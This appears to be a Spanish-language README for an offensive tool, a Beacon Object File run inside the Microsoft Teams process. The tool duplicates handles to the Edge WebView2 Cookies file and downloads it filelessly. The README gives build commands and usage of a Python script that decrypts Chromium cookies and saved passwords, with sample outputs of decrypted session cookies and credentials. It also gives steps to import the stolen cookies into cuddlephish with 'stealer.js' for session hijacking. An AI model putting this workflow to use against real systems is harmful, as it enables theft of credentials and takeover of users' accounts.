
BOF para robar cookies de Teams
Roba cookies de Teams mientras se ejecuta dentro del proceso ms-teams.exe. Publicación relacionada: https://tierzerosecurity.co.nz/2025/11/03/teams-cookies-bof.html
Basado en: https://blog.randorisec.fr/ms-teams-access-tokens/.
Esta herramienta se basa en gran medida en Cookie-Monster-BOF.
El BOF extraerá la clave de cifrado, localizará los procesos msedgewebview2.exe que tengan un identificador (handle) del archivo de Cookies, copiará el identificador y luego descargará el archivo objetivo de forma fileless.
Una vez descargadas las Cookies, el script de descifrado en Python (ver más abajo) se puede utilizar para extraer esos secretos.
Se supone que el BOF se ejecuta dentro del proceso de Teams ms-teams.exe. El BOF no acepta argumentos.
Asegúrese de que Mingw-w64 y make estén instalados en Linux antes de compilar.
make
Instalar requisitos
pip3 install -r requirements.txt
Uso
python3 decrypt.py -h
usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY]
Decrypt Chromium cookies and passwords given a key and DB file
options:
-h, --help show this help message and exit
-k KEY, --key KEY Decryption key
-o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox}
Option to choose
-f FILE, --file FILE Location of the database file
--chrome-aes-key CHROME_AES_KEY
Chrome AES Key
Ejemplos: Descifrar archivo de cookies de Chrome/Edge
python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Descifrar cookies de Chrome con la clave AES de Chrome
python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db
Cookies saved to cuddlephish_2025-07-03_01-53-57.json
Descifrar archivo de cookies de Chrome/Edge y guardar en json
python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db
Results Example:
Cookies saved to 2025-04-11_18-06-10_cookies.json
Importar el archivo JSON de cookies con https://cookie-editor.com/
Descifrar archivo de contraseñas de Chrome/Edge
python .\decrypt.py -k "\xec\xfc...." -o passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Descifrar cookies de Firefox y credenciales almacenadas:
https://github.com/lclevy/firepwd
Se añadió la opción cuddlephish al script de descifrado, que debería permitir usar la cookie con https://github.com/fkasler/cuddlephish
# Decrypt Cookies
python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db
# Clone Project
cd
git clone https://github.com/fkasler/cuddlephish
cd cuddlephish
# Install Dependencies Example on Debian
curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh
sudo -E bash nodesource_setup.sh
sudo apt-get install nodejs
npm install
# Import Cookies
cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json .
node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json
Robo de tokens de acceso de Microsoft Teams en 2025:
https://blog.randorisec.fr/ms-teams-access-tokens/
Cookie-Monster-BOF:
https://github.com/KingOfTheNOPs/cookie-monster
Cookie Webkit Master Key Extractor:
https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Descarga fileless:
https://github.com/fortra/nanodump